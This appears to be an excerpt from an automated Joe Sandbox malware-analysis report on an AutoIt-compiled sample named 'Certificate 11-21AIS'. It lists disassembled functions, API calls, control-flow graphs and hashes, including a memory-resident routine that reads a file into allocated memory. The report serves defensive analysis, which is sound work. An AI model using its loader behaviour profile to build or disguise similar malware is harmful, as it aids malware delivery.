                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F7C
                                                                              • __set_osfhnd.LIBCMT ref: 008F5FAC
                                                                              • __lseeki64_nolock.LIBCMT ref: 008F6016
                                                                              • __close_nolock.LIBCMT ref: 008F603C
                                                                              • __chsize_nolock.LIBCMT ref: 008F606C
                                                                              • __lseeki64_nolock.LIBCMT ref: 008F607E
                                                                              • __lseeki64_nolock.LIBCMT ref: 008F6176
                                                                              • __lseeki64_nolock.LIBCMT ref: 008F618B
                                                                              • __close_nolock.LIBCMT ref: 008F61EB
                                                                                • Part of subcall function 008EEA9C: CloseHandle.KERNELBASE(00000000,0096EEF4,00000000,?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAEC
                                                                                • Part of subcall function 008EEA9C: GetLastError.KERNEL32(?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAF6
                                                                                • Part of subcall function 008EEA9C: __free_osfhnd.LIBCMT ref: 008EEB03
                                                                                • Part of subcall function 008EEA9C: __dosmaperr.LIBCMT ref: 008EEB25
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • __lseeki64_nolock.LIBCMT ref: 008F620D
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F6342
                                                                              • ___createFile.LIBCMT ref: 008F6361
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008F636E
                                                                              • __dosmaperr.LIBCMT ref: 008F6375
                                                                              • __free_osfhnd.LIBCMT ref: 008F6395
                                                                              • __invoke_watson.LIBCMT ref: 008F63C3
                                                                              • __wsopen_helper.LIBCMT ref: 008F63DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                              • String ID: @
                                                                              • API String ID: 3896587723-2766056989
                                                                              • Opcode ID: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
                                                                              • Instruction ID: e12eeb7f0e5a57bdc35d2f934b4f9e86df024a7053145e4d79226f2b19492343
                                                                              • Opcode Fuzzy Hash: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
                                                                              • Instruction Fuzzy Hash: 3B22367190460E9BEB299F78CC45BBD7B61FB41324F284228E721EB2E2E7358D60D751
                                                                              Function 0090FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _wcscpy.LIBCMT ref: 0090FA96
                                                                              • _wcschr.LIBCMT ref: 0090FAA4
                                                                              • _wcscpy.LIBCMT ref: 0090FABB
                                                                              • _wcscat.LIBCMT ref: 0090FACA
                                                                              • _wcscat.LIBCMT ref: 0090FAE8
                                                                              • _wcscpy.LIBCMT ref: 0090FB09
                                                                              • __wsplitpath.LIBCMT ref: 0090FBE6
                                                                              • _wcscpy.LIBCMT ref: 0090FC0B
                                                                              • _wcscpy.LIBCMT ref: 0090FC1D
                                                                              • _wcscpy.LIBCMT ref: 0090FC32
                                                                              • _wcscat.LIBCMT ref: 0090FC47
                                                                              • _wcscat.LIBCMT ref: 0090FC59
                                                                              • _wcscat.LIBCMT ref: 0090FC6E
                                                                                • Part of subcall function 0090BFA4: _wcscmp.LIBCMT ref: 0090C03E
                                                                                • Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C083
                                                                                • Part of subcall function 0090BFA4: _wcscpy.LIBCMT ref: 0090C096
                                                                                • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0A9
                                                                                • Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C0CE
                                                                                • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0E4
                                                                                • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                              • API String ID: 2955681530-2806939583
                                                                              • Opcode ID: 0cc6082dd11ee2bd54fd1943f584511757dbe49b1e8bf70e962e71a06d8bf948
                                                                              • Instruction ID: 08855314d98d7c4067c0dac7d753000ffeb0c2e3c47ed51f7a1bb8d6e8284e60
                                                                              • Opcode Fuzzy Hash: 0cc6082dd11ee2bd54fd1943f584511757dbe49b1e8bf70e962e71a06d8bf948
                                                                              • Instruction Fuzzy Hash: 1A91A272504345AFDB20EB58C851F9AB3E8FF84310F04896DF999D7292DB74EA44CB92
                                                                              Function 008C3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 008C3F86
                                                                              • RegisterClassExW.USER32(00000030), ref: 008C3FB0
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
                                                                              • LoadIconW.USER32(000000A9), ref: 008C4004
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
                                                                              • Instruction ID: 1a7ea323a10b07a66e7dab7f5d95b836ad9a3f92deb1a3b0efe7dac38d513a6a
                                                                              • Opcode Fuzzy Hash: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
                                                                              • Instruction Fuzzy Hash: F821F7B9D25318AFDB00DFA4EC89BCDBBB8FB09700F00421AF611A63A0D7B50545AF90
                                                                              Function 0090BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0090BDB4: __time64.LIBCMT ref: 0090BDBE
                                                                                • Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F
                                                                              • __wsplitpath.LIBCMT ref: 0090C083
                                                                                • Part of subcall function 008E1DFC: __wsplitpath_helper.LIBCMT ref: 008E1E3C
                                                                              • _wcscpy.LIBCMT ref: 0090C096
                                                                              • _wcscat.LIBCMT ref: 0090C0A9
                                                                              • __wsplitpath.LIBCMT ref: 0090C0CE
                                                                              • _wcscat.LIBCMT ref: 0090C0E4
                                                                              • _wcscat.LIBCMT ref: 0090C0F7
                                                                              • _wcscmp.LIBCMT ref: 0090C03E
                                                                                • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
                                                                                • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C2A1
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C338
                                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C34E
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C35F
                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C371
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 2378138488-0
                                                                              • Opcode ID: e942133888fbc5ea93adfc9ffbb3cb0b5db36d355b1da2b7ae2002b1435cecb6
                                                                              • Instruction ID: 294f937189edfae4b9bf51c25c778f01183e24cab08a802892c5d1a7903b460b
                                                                              • Opcode Fuzzy Hash: e942133888fbc5ea93adfc9ffbb3cb0b5db36d355b1da2b7ae2002b1435cecb6
                                                                              • Instruction Fuzzy Hash: 30C12CB1900219AFDF15DF99CC81EDEB7BDEF49300F1081AAF609E6151DB709A848F65
                                                                              Function 008C3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 957 8c3742-8c3762 959 8c3764-8c3767 957->959 960 8c37c2-8c37c4 957->960 962 8c37c8 959->962 963 8c3769-8c3770 959->963 960->959 961 8c37c6 960->961 964 8c37ab-8c37b3 DefWindowProcW 961->964 965 8c37ce-8c37d1 962->965 966 931e00-931e2e call 8c2ff6 call 8de312 962->966 967 8c382c-8c3834 PostQuitMessage 963->967 968 8c3776-8c377b 963->968 969 8c37b9-8c37bf 964->969 970 8c37f6-8c381d SetTimer RegisterWindowMessageW 965->970 971 8c37d3-8c37d4 965->971 1000 931e33-931e3a 966->1000 975 8c37f2-8c37f4 967->975 973 931e88-931e9c call 904ddd 968->973 974 8c3781-8c3783 968->974 970->975 979 8c381f-8c382a CreatePopupMenu 970->979 976 931da3-931da6 971->976 977 8c37da-8c37ed KillTimer call 8c3847 call 8c390f 971->977 973->975 991 931ea2 973->991 980 8c3789-8c378e 974->980 981 8c3836-8c3845 call 8deb83 974->981 975->969 984 931da8-931daa 976->984 985 931ddc-931dfb MoveWindow 976->985 977->975 979->975 988 8c3794-8c3799 980->988 989 931e6d-931e74 980->989 981->975 993 931dcb-931dd7 SetFocus 984->993 994 931dac-931daf 984->994 985->975 998 8c379f-8c37a5 988->998 999 931e58-931e68 call 9055bd 988->999 989->964 996 931e7a-931e83 call 8fa5f3 989->996 991->964 993->975 994->998 1001 931db5-931dc6 call 8c2ff6 994->1001 996->964 998->964 998->1000 999->975 1000->964 1005 931e40-931e53 call 8c3847 call 8c4ffc 1000->1005 1001->975 1005->964
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 008C37B3
                                                                              • KillTimer.USER32(?,00000001), ref: 008C37DD
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C3800
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C380B
                                                                              • CreatePopupMenu.USER32 ref: 008C381F
                                                                              • PostQuitMessage.USER32(00000000), ref: 008C382E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated
                                                                              • API String ID: 129472671-2362178303
                                                                              • Opcode ID: 40a63cfd6f67036366c73d1d059b7954e7b19119c343085c816b44f52dd68165
                                                                              • Instruction ID: 7a7a8955fea781722dc773c834f0973025fc9a40e5264f5461e07f537ca163b8
                                                                              • Opcode Fuzzy Hash: 40a63cfd6f67036366c73d1d059b7954e7b19119c343085c816b44f52dd68165
                                                                              • Instruction Fuzzy Hash: 8D41F7F511824D6BDB246F689C49F7936B9F705305F00813DF902D62A1CA70DD43A762
                                                                              Function 008C3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 008C3E79
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
                                                                              • LoadIconW.USER32(00000063), ref: 008C3E9E
                                                                              • LoadIconW.USER32(000000A4), ref: 008C3EB0
                                                                              • LoadIconW.USER32(000000A2), ref: 008C3EC2
                                                                                • Part of subcall function 008C4024: LoadImageW.USER32(008C0000,00000063,00000001,00000010,00000010,00000000), ref: 008C4048
                                                                              • RegisterClassExW.USER32(?), ref: 008C3F30
                                                                                • Part of subcall function 008C3F53: GetSysColorBrush.USER32(0000000F), ref: 008C3F86
                                                                                • Part of subcall function 008C3F53: RegisterClassExW.USER32(00000030), ref: 008C3FB0
                                                                                • Part of subcall function 008C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
                                                                                • Part of subcall function 008C3F53: InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
                                                                                • Part of subcall function 008C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
                                                                                • Part of subcall function 008C3F53: LoadIconW.USER32(000000A9), ref: 008C4004
                                                                                • Part of subcall function 008C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
                                                                              • Instruction ID: 1bb2aa12f2367ae7e2d37af74ab0bb91376df47a4300b254413caf2532bff668
                                                                              • Opcode Fuzzy Hash: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
                                                                              • Instruction Fuzzy Hash: 402162B4D18304ABCB14DFA9EC49B9DBFF9FB48710F00812AE604A33A0D7754645AF91
                                                                              Function 008EACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1021 8eacb3-8eace0 call 8e6ac0 call 8e7cf4 call 8e6986 1028 8eacfd-8ead02 1021->1028 1029 8eace2-8eacf8 call 8ee880 1021->1029 1031 8ead08-8ead0f 1028->1031 1035 8eaf52-8eaf57 call 8e6b05 1029->1035 1033 8ead42-8ead51 GetStartupInfoW 1031->1033 1034 8ead11-8ead40 1031->1034 1036 8ead57-8ead5c 1033->1036 1037 8eae80-8eae86 1033->1037 1034->1031 1036->1037 1041 8ead62-8ead79 1036->1041 1038 8eae8c-8eae9d 1037->1038 1039 8eaf44-8eaf50 call 8eaf58 1037->1039 1042 8eae9f-8eaea2 1038->1042 1043 8eaeb2-8eaeb8 1038->1043 1039->1035 1046 8ead7b-8ead7d 1041->1046 1047 8ead80-8ead83 1041->1047 1042->1043 1048 8eaea4-8eaead 1042->1048 1049 8eaebf-8eaec6 1043->1049 1050 8eaeba-8eaebd 1043->1050 1046->1047 1052 8ead86-8ead8c 1047->1052 1053 8eaf3e-8eaf3f 1048->1053 1054 8eaec9-8eaed5 GetStdHandle 1049->1054 1050->1054 1055 8eadae-8eadb6 1052->1055 1056 8ead8e-8ead9f call 8e6986 1052->1056 1053->1037 1058 8eaf1c-8eaf32 1054->1058 1059 8eaed7-8eaed9 1054->1059 1057 8eadb9-8eadbb 1055->1057 1065 8eada5-8eadab 1056->1065 1066 8eae33-8eae3a 1056->1066 1057->1037 1063 8eadc1-8eadc6 1057->1063 1058->1053 1062 8eaf34-8eaf37 1058->1062 1059->1058 1064 8eaedb-8eaee4 GetFileType 1059->1064 1062->1053 1067 8eadc8-8eadcb 1063->1067 1068 8eae20-8eae31 1063->1068 1064->1058 1069 8eaee6-8eaef0 1064->1069 1065->1055 1073 8eae40-8eae4e 1066->1073 1067->1068 1070 8eadcd-8eadd1 1067->1070 1068->1057 1071 8eaefa-8eaefd 1069->1071 1072 8eaef2-8eaef8 1069->1072 1070->1068 1074 8eadd3-8eadd5 1070->1074 1076 8eaeff-8eaf03 1071->1076 1077 8eaf08-8eaf1a InitializeCriticalSectionAndSpinCount 1071->1077 1075 8eaf05 1072->1075 1078 8eae74-8eae7b 1073->1078 1079 8eae50-8eae72 1073->1079 1080 8eadd7-8eade3 GetFileType 1074->1080 1081 8eade5-8eae1a InitializeCriticalSectionAndSpinCount 1074->1081 1075->1077 1076->1075 1077->1053 1078->1052 1079->1073 1080->1081 1082 8eae1d 1080->1082 1081->1082 1082->1068
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 008EACC1
                                                                                • Part of subcall function 008E7CF4: __mtinitlocknum.LIBCMT ref: 008E7D06
                                                                                • Part of subcall function 008E7CF4: EnterCriticalSection.KERNEL32(00000000,?,008E7ADD,0000000D), ref: 008E7D1F
                                                                              • __calloc_crt.LIBCMT ref: 008EACD2
                                                                                • Part of subcall function 008E6986: __calloc_impl.LIBCMT ref: 008E6995
                                                                                • Part of subcall function 008E6986: Sleep.KERNEL32(00000000,000003BC,008DF507,?,0000000E), ref: 008E69AC
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 008EACED
                                                                              • GetStartupInfoW.KERNEL32(?,00976E28,00000064,008E5E91,00976C70,00000014), ref: 008EAD46
                                                                              • __calloc_crt.LIBCMT ref: 008EAD91
                                                                              • GetFileType.KERNEL32(00000001), ref: 008EADD8
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 008EAE11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1426640281-0
                                                                              • Opcode ID: 07b09be7188003bf32213ed07badd4c9e0629e072711ad338d917a46d6a5bd29
                                                                              • Instruction ID: 7c89c5bb5b2dbf9586372c5d894fe1d79f2d953bf384e5ac8c08efb75830a1ce
                                                                              • Opcode Fuzzy Hash: 07b09be7188003bf32213ed07badd4c9e0629e072711ad338d917a46d6a5bd29
                                                                              • Instruction Fuzzy Hash: D581F2719057868FDB28CF69C8805A9BBF0FF47B24B24425DD4A6EB3D1D734A802CB52
                                                                              Function 011B5230 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1083 11b5230-11b52de call 11b2c80 1086 11b52e5-11b530b call 11b6140 CreateFileW 1083->1086 1089 11b530d 1086->1089 1090 11b5312-11b5322 1086->1090 1091 11b545d-11b5461 1089->1091 1097 11b5329-11b5343 VirtualAlloc 1090->1097 1098 11b5324 1090->1098 1092 11b54a3-11b54a6 1091->1092 1093 11b5463-11b5467 1091->1093 1099 11b54a9-11b54b0 1092->1099 1095 11b5469-11b546c 1093->1095 1096 11b5473-11b5477 1093->1096 1095->1096 1100 11b5479-11b5483 1096->1100 1101 11b5487-11b548b 1096->1101 1102 11b534a-11b5361 ReadFile 1097->1102 1103 11b5345 1097->1103 1098->1091 1104 11b54b2-11b54bd 1099->1104 1105 11b5505-11b551a 1099->1105 1100->1101 1108 11b549b 1101->1108 1109 11b548d-11b5497 1101->1109 1110 11b5368-11b53a8 VirtualAlloc 1102->1110 1111 11b5363 1102->1111 1103->1091 1112 11b54bf 1104->1112 1113 11b54c1-11b54cd 1104->1113 1106 11b552a-11b5532 1105->1106 1107 11b551c-11b5527 VirtualFree 1105->1107 1107->1106 1108->1092 1109->1108 1116 11b53aa 1110->1116 1117 11b53af-11b53ca call 11b6390 1110->1117 1111->1091 1112->1105 1114 11b54cf-11b54df 1113->1114 1115 11b54e1-11b54ed 1113->1115 1119 11b5503 1114->1119 1120 11b54fa-11b5500 1115->1120 1121 11b54ef-11b54f8 1115->1121 1116->1091 1123 11b53d5-11b53df 1117->1123 1119->1099 1120->1119 1121->1119 1124 11b5412-11b5426 call 11b61a0 1123->1124 1125 11b53e1-11b5410 call 11b6390 1123->1125 1131 11b542a-11b542e 1124->1131 1132 11b5428 1124->1132 1125->1123 1133 11b543a-11b543e 1131->1133 1134 11b5430-11b5434 CloseHandle 1131->1134 1132->1091 1135 11b544e-11b5457 1133->1135 1136 11b5440-11b544b VirtualFree 1133->1136 1134->1133 1135->1086 1135->1091 1136->1135
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011B5301
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011B5527
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                              • Instruction ID: e8be1445a88caf7065bf0b56806644dadc2fe792454c97bb5be5e00bf11eb7c5
                                                                              • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                              • Instruction Fuzzy Hash: A9A11A74E04209EBDB58CFA4C894BEEBBB6FF48305F108559E205BB280D7799A40CF55
                                                                              Function 008C49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1192 8c49fb-8c4a25 call 8cbcce RegOpenKeyExW 1195 8c4a2b-8c4a2f 1192->1195 1196 9341cc-9341e3 RegQueryValueExW 1192->1196 1197 934246-93424f RegCloseKey 1196->1197 1198 9341e5-934222 call 8df4ea call 8c47b7 RegQueryValueExW 1196->1198 1203 934224-93423b call 8c6a63 1198->1203 1204 93423d-934245 call 8c47e2 1198->1204 1203->1204 1204->1197
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009341DB
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0093421A
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00934249
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpen
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                              • API String ID: 1586453840-614718249
                                                                              • Opcode ID: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
